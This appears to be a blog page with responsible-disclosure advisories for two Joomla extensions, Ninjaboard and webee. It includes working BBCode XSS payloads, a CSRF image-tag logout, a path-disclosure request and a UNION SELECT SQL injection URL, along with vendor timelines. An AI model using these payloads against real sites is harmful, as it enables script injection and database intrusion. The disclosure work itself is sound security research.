Since releasing JMyLife, I've gotten a lot of feedback from users as far as what features they would like to see in the next release. I figured I'd go ahead and start a list of the features I'd like to see make it into 1.1, even though development has not officially started.

I am proud to announce that JMyLife is now listed over at CMS Market! You can see JMyLife's listing here: JMyLife on CMS Market

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

1. XSS 1: Nested [img] Tags

   [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

2. XSS 2: JavaScript links

   [url=javascript:alert('xss');]http://google.com[/url]

   Requires minimal user interaction

3. XSS 3: CSS Injection

   [color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]

4. XSS 4: Nested [url] Tags

   Requires minimal user interaction, displays indications of malware, but still technically exploitable.

   [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

5. CSRF: [img] Tags

   [img]http://victim-site.com/index.php?option=com_user&task=logout[/img]

6. Path Disclosure: Profile View 'id' parameter

   Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.

   index.php?option=com_ninjaboard&view=profile&id='

These issues are fixed in the latest release, and users are urged to upgrade.

Timeline

• Vulnerabilities Discovered: 14 July 2009
• Vendor Notified: 16 July 2009
• Vendor Response: 16 July 2009
• Update Available: 2009
• Disclosure: 15 November... 2009

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

1. SQL Injection

   The 'articleId' is not sanitized.

   index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --

2. [img] BBCode [color] Tag XSS

   [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]

3. [url] BBCode [img] Tag XSS

   [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]

4. [size] BBCode [url] Tag XSS

   [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2

Timeline

• Vulnerabilities Discovered: 4 November 2009
• Vendor Notified: 4 November 2009
• Vendor Notified Again: 9 November 2009
• Vendor Response: ... 2009
• Update Available: ... 2009
• Disclosure: 15 November 2009